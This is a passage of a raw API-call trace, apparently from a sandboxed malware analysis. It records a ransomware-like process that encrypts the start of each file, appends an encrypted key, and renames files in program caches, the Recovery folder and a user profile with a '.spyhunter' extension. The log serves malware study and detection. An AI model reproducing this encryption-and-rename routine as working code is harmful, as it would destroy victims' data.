(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0130.041] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6b8*=0x30) returned 1 [0130.041] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0130.042] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0130.042] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 [0130.042] GetProcessHeap () returned 0x2c0000 [0130.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.043] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f67c*=0x2800, lpOverlapped=0x0) returned 1 [0130.044] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.044] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f67c*=0x2800, lpOverlapped=0x0) returned 1 [0130.045] GetProcessHeap () returned 0x2c0000 [0130.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.045] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.045] WriteFile (in: hFile=0x170, lpBuffer=0x57f6bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f67c, lpOverlapped=0x0 | out: lpBuffer=0x57f6bc*, lpNumberOfBytesWritten=0x57f67c*=0x4, lpOverlapped=0x0) returned 1 [0130.045] WriteFile (in: hFile=0x170, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f67c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f67c*=0x30, lpOverlapped=0x0) returned 1 [0130.045] CloseHandle (hObject=0x170) returned 1 [0130.045] GetProcessHeap () returned 0x2c0000 [0130.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0130.045] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.spyhunter") returned 155 [0130.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.spyhunter")) returned 1 [0130.046] GetProcessHeap () returned 0x2c0000 [0130.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0130.046] GetProcessHeap () returned 0x2c0000 [0130.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.046] GetProcessHeap () returned 0x2c0000 [0130.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7cf0 | out: hHeap=0x2c0000) returned 1 [0130.046] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6c0 | out: pbBuffer=0x57f6c0) returned 1 [0130.046] GetProcessHeap () returned 0x2c0000 [0130.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0130.046] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6b8*=0x30) returned 1 [0130.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0130.047] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0130.047] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0130.047] GetProcessHeap () returned 0x2c0000 [0130.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.047] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f67c*=0x2800, lpOverlapped=0x0) returned 1 [0130.048] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.048] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f67c*=0x2800, lpOverlapped=0x0) returned 1 [0130.049] GetProcessHeap () returned 0x2c0000 [0130.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.049] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.049] WriteFile (in: hFile=0x170, lpBuffer=0x57f6bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f67c, lpOverlapped=0x0 | out: lpBuffer=0x57f6bc*, lpNumberOfBytesWritten=0x57f67c*=0x4, lpOverlapped=0x0) returned 1 [0130.050] WriteFile (in: hFile=0x170, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f67c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f67c*=0x30, lpOverlapped=0x0) returned 1 [0130.050] CloseHandle (hObject=0x170) returned 1 [0130.050] GetProcessHeap () returned 0x2c0000 [0130.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0130.050] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.spyhunter") returned 135 [0130.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.spyhunter" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.spyhunter")) returned 1 [0130.051] GetProcessHeap () returned 0x2c0000 [0130.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0130.051] GetProcessHeap () returned 0x2c0000 [0130.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.051] GetProcessHeap () returned 0x2c0000 [0130.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3bfc8 | out: hHeap=0x2c0000) returned 1 [0130.051] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6b8 | out: pbBuffer=0x57f6b8) returned 1 [0130.051] GetProcessHeap () returned 0x2c0000 [0130.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0130.051] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6b0*=0x30) returned 1 [0130.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0130.159] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0130.160] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0130.160] GetProcessHeap () returned 0x2c0000 [0130.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0130.160] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f674, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f674*=0x2800, lpOverlapped=0x0) returned 1 [0130.237] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.237] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f674, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f674*=0x2800, lpOverlapped=0x0) returned 1 [0130.238] GetProcessHeap () returned 0x2c0000 [0130.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0130.238] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.238] WriteFile (in: hFile=0x16c, lpBuffer=0x57f6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f674, lpOverlapped=0x0 | out: lpBuffer=0x57f6b4*, lpNumberOfBytesWritten=0x57f674*=0x4, lpOverlapped=0x0) returned 1 [0130.239] WriteFile (in: hFile=0x16c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f674, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f674*=0x30, lpOverlapped=0x0) returned 1 [0130.239] CloseHandle (hObject=0x16c) returned 1 [0130.330] GetProcessHeap () returned 0x2c0000 [0130.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0130.330] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.spyhunter") returned 149 [0130.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.spyhunter")) returned 1 [0130.331] GetProcessHeap () returned 0x2c0000 [0130.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0130.331] GetProcessHeap () returned 0x2c0000 [0130.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.331] GetProcessHeap () returned 0x2c0000 [0130.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ab80 | out: hHeap=0x2c0000) returned 1 [0130.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6b8 | out: pbBuffer=0x57f6b8) returned 1 [0130.332] GetProcessHeap () returned 0x2c0000 [0130.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0130.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6b0*=0x30) returned 1 [0130.332] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\.." (normalized: "c:\\recovery"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.332] GetProcessHeap () returned 0x2c0000 [0130.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.332] GetProcessHeap () returned 0x2c0000 [0130.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2280 | out: hHeap=0x2c0000) returned 1 [0130.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6b0 | out: pbBuffer=0x57f6b0) returned 1 [0130.332] GetProcessHeap () returned 0x2c0000 [0130.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0130.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6a8*=0x30) returned 1 [0130.332] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\." (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.332] GetProcessHeap () returned 0x2c0000 [0130.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.332] GetProcessHeap () returned 0x2c0000 [0130.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec21c8 | out: hHeap=0x2c0000) returned 1 [0130.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6b0 | out: pbBuffer=0x57f6b0) returned 1 [0130.333] GetProcessHeap () returned 0x2c0000 [0130.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0130.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6a8*=0x30) returned 1 [0130.333] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.333] GetProcessHeap () returned 0x2c0000 [0130.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.333] GetProcessHeap () returned 0x2c0000 [0130.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2118 | out: hHeap=0x2c0000) returned 1 [0130.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6a8 | out: pbBuffer=0x57f6a8) returned 1 [0130.333] GetProcessHeap () returned 0x2c0000 [0130.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0130.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6a0*=0x30) returned 1 [0130.333] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\." (normalized: "c:\\recovery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.333] GetProcessHeap () returned 0x2c0000 [0130.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.333] GetProcessHeap () returned 0x2c0000 [0130.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a20a8 | out: hHeap=0x2c0000) returned 1 [0130.337] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f698 | out: pbBuffer=0x57f698) returned 1 [0130.337] GetProcessHeap () returned 0x2c0000 [0130.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0130.337] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f690*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f690*=0x30) returned 1 [0130.337] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0130.338] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0130.338] StrStrW (lpFirst="jaureglist.xml", lpSrch=".txt") returned 0x0 [0130.338] GetProcessHeap () returned 0x2c0000 [0130.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.338] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f654, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f654*=0x77, lpOverlapped=0x0) returned 1 [0130.339] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff89, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.339] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x77, lpNumberOfBytesWritten=0x57f654, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f654*=0x77, lpOverlapped=0x0) returned 1 [0130.339] GetProcessHeap () returned 0x2c0000 [0130.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.339] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.340] WriteFile (in: hFile=0x16c, lpBuffer=0x57f694*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f654, lpOverlapped=0x0 | out: lpBuffer=0x57f694*, lpNumberOfBytesWritten=0x57f654*=0x4, lpOverlapped=0x0) returned 1 [0130.340] WriteFile (in: hFile=0x16c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f654, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f654*=0x30, lpOverlapped=0x0) returned 1 [0130.340] CloseHandle (hObject=0x16c) returned 1 [0130.340] GetProcessHeap () returned 0x2c0000 [0130.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0130.340] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.spyhunter") returned 64 [0130.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.spyhunter" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml.spyhunter")) returned 1 [0130.341] GetProcessHeap () returned 0x2c0000 [0130.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0130.341] GetProcessHeap () returned 0x2c0000 [0130.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0130.341] GetProcessHeap () returned 0x2c0000 [0130.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2110 | out: hHeap=0x2c0000) returned 1 [0131.878] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f678 | out: pbBuffer=0x57f678) returned 1 [0131.879] GetProcessHeap () returned 0x2c0000 [0131.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0131.879] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f670*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f670*=0x30) returned 1 [0131.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0132.076] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".txt") returned 0x0 [0132.076] GetProcessHeap () returned 0x2c0000 [0132.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.076] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f634, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f634*=0x2800, lpOverlapped=0x0) returned 1 [0132.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.077] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f634, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f634*=0x2800, lpOverlapped=0x0) returned 1 [0132.077] GetProcessHeap () returned 0x2c0000 [0132.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.077] WriteFile (in: hFile=0x158, lpBuffer=0x57f674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f634, lpOverlapped=0x0 | out: lpBuffer=0x57f674*, lpNumberOfBytesWritten=0x57f634*=0x4, lpOverlapped=0x0) returned 1 [0132.077] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f634, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f634*=0x30, lpOverlapped=0x0) returned 1 [0132.077] CloseHandle (hObject=0x158) returned 1 [0132.077] GetProcessHeap () returned 0x2c0000 [0132.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.077] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.spyhunter") returned 169 [0132.078] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 